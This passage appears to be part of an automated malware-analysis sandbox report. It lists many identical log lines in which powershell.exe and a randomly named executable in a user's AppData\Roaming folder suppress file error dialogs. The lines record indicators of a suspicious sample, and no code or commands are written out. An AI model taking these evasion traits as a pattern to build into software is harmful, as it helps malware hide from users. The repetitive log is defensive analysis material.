Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TwkYThKVQVaYn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
